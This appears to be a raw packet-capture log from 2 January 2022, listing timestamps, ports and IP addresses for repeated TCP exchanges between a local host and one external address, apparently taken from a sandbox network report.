Jan 2, 2022 02:28:16.464267015 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464315891 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464370012 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464409113 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464422941 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464431047 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.464448929 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464483023 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.464685917 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465029001 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465069056 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465150118 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465229034 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465272903 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465310097 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465351105 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465357065 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465392113 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465400934 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465430021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465468884 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465512991 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465518951 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465552092 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465568066 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.465580940 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.465626955 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629270077 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629329920 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629362106 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629391909 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629422903 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629462957 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629503012 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629523993 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629542112 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629550934 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629581928 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629620075 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629657984 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629683018 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629688025 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629698992 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629739046 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629776001 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629815102 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629832983 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629837990 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.629857063 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629894018 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629931927 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629970074 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.629977942 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630009890 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630050898 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630068064 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630073071 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630088091 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630126953 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630166054 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630192995 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630227089 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630230904 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630234003 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630270958 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630310059 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630351067 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630388021 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630425930 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630434990 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630439997 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.630458117 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:16.630525112 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:16.684977055 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:23.019022942 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:23.019105911 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:23.183657885 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:23.186050892 CET	62758	49837	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:23.186208963 CET	49837	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:25.900829077 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:25.904047966 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:26.119466066 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:27.703649044 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:27.707261086 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:27.748337984 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:27.872028112 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:27.872288942 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:27.878463984 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.047765017 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.092912912 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.257750988 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.272551060 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.479316950 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.479531050 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.650832891 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.650886059 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.650938034 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.650966883 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.650979996 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651020050 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651051998 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.651055098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651092052 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651134014 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651155949 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651164055 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.651192904 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651206017 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.651220083 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.651256084 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816035032 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816073895 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816118956 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816137075 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816150904 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816185951 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816225052 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816231966 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816253901 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816260099 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816286087 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816315889 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816354036 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816355944 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816382885 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816421986 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816426992 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816451073 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816489935 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816493034 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816520929 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816559076 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816575050 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816590071 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816607952 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816620111 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816651106 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816690922 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816694975 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.816710949 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.816756010 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.981544018 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981586933 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981617928 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981648922 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981694937 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981728077 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981756926 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981770992 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.981789112 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981820107 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981851101 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981878996 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981909037 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981940985 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.981944084 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.981971025 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982001066 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982012987 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982033014 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982062101 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982100964 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982109070 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982141972 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982170105 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982180119 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982211113 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982240915 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982249022 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982280016 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982315063 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982316017 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982347012 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982379913 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982384920 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982414007 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982450008 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982455015 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982481003 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982516050 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982521057 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982538939 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982569933 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982606888 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982620001 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982637882 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982671976 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982675076 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982696056 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982727051 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982757092 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982791901 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982800961 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982825041 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982851982 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:28.982865095 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:28.982958078 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148116112 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148159027 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148190975 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148221016 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148252964 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148266077 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148281097 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148296118 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148329020 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148367882 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148377895 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148399115 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148406029 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148427963 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148462057 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148492098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148493052 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148524046 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148536921 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148552895 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148601055 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148602962 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148629904 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148668051 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148679972 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148699045 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148727894 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148757935 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148758888 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148789883 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148792982 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148819923 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148875952 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.148875952 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148921013 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148952007 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148982048 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.148983955 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149012089 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149032116 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149041891 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149071932 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149112940 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149118900 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149144888 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149182081 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149195910 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149211884 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149230957 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149243116 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149274111 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149316072 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149321079 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149347067 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149369955 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149386883 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149416924 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149455070 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149465084 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149483919 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149513960 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149516106 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149544954 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149583101 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149593115 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149614096 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149631023 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149645090 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149673939 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149710894 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149727106 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.149732113 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.149766922 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.314688921 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314730883 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314776897 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314809084 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314846992 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314877987 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314918041 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314949989 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.314990044 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315021038 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315026999 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315052032 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315083027 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315085888 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315113068 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315141916 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315143108 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315172911 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315203905 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315217018 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315246105 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315275908 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315287113 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315315008 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315346003 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315357924 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315386057 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315407038 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315416098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315448999 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315486908 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315517902 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315525055 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315557957 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315587044 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315608025 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315624952 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315654993 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315669060 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315695047 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315723896 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315741062 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315762997 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315783024 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315819979 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315823078 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315854073 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315872908 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315891027 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315922022 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315953016 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.315953016 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.315984011 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316024065 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316030979 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.316054106 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316083908 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316097975 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.316114902 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316145897 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316157103 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.316185951 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316211939 CET	49843	62758	192.168.2.6	207.32.218.236
